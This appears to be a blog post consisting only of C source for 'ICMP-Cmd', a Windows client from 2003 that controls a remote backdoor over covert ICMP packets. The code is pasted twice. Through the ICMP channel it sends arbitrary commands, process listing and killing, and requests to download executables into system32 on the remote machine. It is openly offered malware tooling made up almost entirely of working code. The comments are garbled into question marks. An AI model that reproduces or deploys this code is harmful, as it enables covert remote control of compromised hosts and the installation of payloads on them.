#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256];
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4?????
unsigned int version:4; //IP???,4??IPV4
unsigned char tos; //8?????TOS
unsigned short total_len; //16????(??)
unsigned short ident; //16???
unsigned short frag_and_flags; //3????
unsigned char ttl; //8????? TTL
unsigned char proto; //8??? (TCP, UDP ???)
unsigned short checksum; //16?IP?????
unsigned int sourceIP; //32??IP??
unsigned int destIP; //32???IP??
}IpHeader;
typedef struct _ihdr
{
BYTE i_type;//8???
BYTE i_code; //8???
USHORT i_cksum;//16????
USHORT i_id;//???(???????????)
USHORT i_seq;//?????
ULONG timestamp;//???
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[1450];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP????
void help(void);
void usage(char * prog);
int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; //?????IP
char *recvbuf;
if(argc!=2)
{
usage(argv[0]);
return 0;
}
ICMP_DEST_IP=argv[1];//??????IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);
char *icmp_data;
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]);
__try{
for(;;){
printf("ICMP-CMD>");
fgets(SendMsg,1024,stdin);//?????,???SendMsg???
if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
if(!strcmp(SendMsg,"\n"))continue;
if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("\nFileName Error. Use \"-FileName\"\n");continue;}
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
}
if (bwrote<datasize ) {//????????????,?????
return 0;
}
printf("\nSend Packet to %s Success!\n",argv[1]);
DWORD start = GetTickCount();
for(;;){
if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out\n");
break;
}
fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
break;
}
decode_resp(recvbuf, bread, &from);
}
}//end for
}//end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size > 1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if(size)
{
cksum+=*(UCHAR *)buffer;
}
cksum=(cksum >> 16) + (cksum & 0xffff);
cksum+=(cksum >> 16);
return(USHORT) (~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr= (IcmpHeader *)icmp_data;
icmp_hdr->i_type=0;
icmp_hdr->i_code=0;
icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
icmp_hdr->timestamp =GetTickCount();
icmp_hdr->i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));
}
void usage(char * prog)
{
printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
printf("\n");
printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n");
printf("\t\t---[ E-mail: gxisone@hotmail.com ]---\n");
printf("\t\t---[ 2003/8/15 ]---\n");
printf("\t\tusage: %s RemoteIP\n",prog);
printf("\t\tCtrl+C or Q/q to Quite H/h for help\n");
}
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{
memset(arg,0,sizeof(arg));
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==4321)//??????????
{
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
printf(" IcmpType %d",icmphdr->i_type);
printf(" IcmpCode %d",icmphdr->i_code);
printf("\n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
}
else printf("Other ICMP Packets!\n");
}
void help(void)
{
printf("\n");
printf("[http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is \\\\system32)\n");
printf("[pslist] (List the Process)\n");
printf("[pskill ID] (Kill the Process)\n");
printf("Command (run the command)\n");
printf("\n");
}
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib,"ws2_32.lib")
char SendMsg[256];
/* The IP header */
typedef struct iphdr {
unsigned int h_len:4; //4?????
unsigned int version:4; //IP???,4??IPV4
unsigned char tos; //8?????TOS
unsigned short total_len; //16????(??)
unsigned short ident; //16???
unsigned short frag_and_flags; //3????
unsigned char ttl; //8????? TTL
unsigned char proto; //8??? (TCP, UDP ???)
unsigned short checksum; //16?IP?????
unsigned int sourceIP; //32??IP??
unsigned int destIP; //32???IP??
}IpHeader;
typedef struct _ihdr
{
BYTE i_type;//8???
BYTE i_code; //8???
USHORT i_cksum;//16????
USHORT i_id;//???(???????????)
USHORT i_seq;//?????
ULONG timestamp;//???
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[1450];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data(char *, int);
USHORT checksum(USHORT *, int);
void decode_resp(char *,int ,struct sockaddr_in *);//ICMP????
void help(void);
void usage(char * prog);
int main(int argc, char *argv[])
{
char *ICMP_DEST_IP; //?????IP
char *recvbuf;
if(argc!=2)
{
usage(argv[0]);
return 0;
}
ICMP_DEST_IP=argv[1];//??????IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen=sizeof(from);
char *icmp_data;
if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
{
fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout=1000;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout));
timeout=4000;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout));
memset(&dest,0,sizeof(dest));
dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP);
dest.sin_family=AF_INET;
usage(argv[0]);
__try{
for(;;){
printf("ICMP-CMD>");
fgets(SendMsg,1024,stdin);//?????,???SendMsg???
if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0);
if(!strcmp(SendMsg,"\n"))continue;
if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
if(!memcmp(SendMsg,"http://",7))
if(!strstr(SendMsg,"-")){printf("\nFileName Error. Use \"-FileName\"\n");continue;}
datasize=strlen(SendMsg);
datasize+=sizeof(IcmpHeader);
printf("ICMP packet size is %d",datasize);
icmp_data= (char*)xmalloc(MAX_PACKET);
recvbuf= (char *)xmalloc(MAX_PACKET);
memset(icmp_data,0, MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader *)icmp_data)->i_cksum=0;
((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
}
if (bwrote<datasize ) {//????????????,?????
return 0;
}
printf("\nSend Packet to %s Success!\n",argv[1]);
DWORD start = GetTickCount();
for(;;){
if((GetTickCount() - start) >= 1000) break;
memset(recvbuf,0,MAX_PACKET);
int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen);
if(bread == SOCKET_ERROR)
{
if(WSAGetLastError() == WSAETIMEDOUT)
{
printf("timed out\n");
break;
}
fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
break;
}
decode_resp(recvbuf, bread, &from);
}
}//end for
}//end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0;
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size > 1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if(size)
{
cksum+=*(UCHAR *)buffer;
}
cksum=(cksum >> 16) + (cksum & 0xffff);
cksum+=(cksum >> 16);
return(USHORT) (~cksum);
}
void fill_icmp_data(char *icmp_data, int datasize)
{
IcmpHeader *icmp_hdr;
char *datapart;
icmp_hdr= (IcmpHeader *)icmp_data;
icmp_hdr->i_type=0;
icmp_hdr->i_code=0;
icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
icmp_hdr->timestamp =GetTickCount();
icmp_hdr->i_seq=1234;
datapart=icmp_data + sizeof(IcmpHeader);
memcpy(datapart,SendMsg,sizeof(SendMsg));
}
void usage(char * prog)
{
printf("\t\t=====Welcome to www.hackerxfiles.net======\n");
printf("\n");
printf("\t\t---[ ICMP-Cmd v1.0 beta, by gxisone ]---\n");
printf("\t\t---[ E-mail: gxisone@hotmail.com ]---\n");
printf("\t\t---[ 2003/8/15 ]---\n");
printf("\t\tusage: %s RemoteIP\n",prog);
printf("\t\tCtrl+C or Q/q to Quite H/h for help\n");
}
void decode_resp(char *buf, int bytes,struct sockaddr_in *from)
{
memset(arg,0,sizeof(arg));
IpHeader *iphdr;
IcmpHeader *icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader *)buf;
iphdrlen = iphdr->h_len * 4 ;
icmphdr = (IcmpHeader*)(buf + iphdrlen);
if(icmphdr->i_seq==4321)//??????????
{
printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
printf(" IcmpType %d",icmphdr->i_type);
printf(" IcmpCode %d",icmphdr->i_code);
printf("\n");
memcpy(arg,buf+iphdrlen+12,1450);
printf("%s",arg);
}
else printf("Other ICMP Packets!\n");
}
void help(void)
{
printf("\n");
printf("[http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is \\\\system32)\n");
printf("[pslist] (List the Process)\n");
printf("[pskill ID] (Kill the Process)\n");
printf("Command (run the command)\n");
printf("\n");
}
No comments:
Post a Comment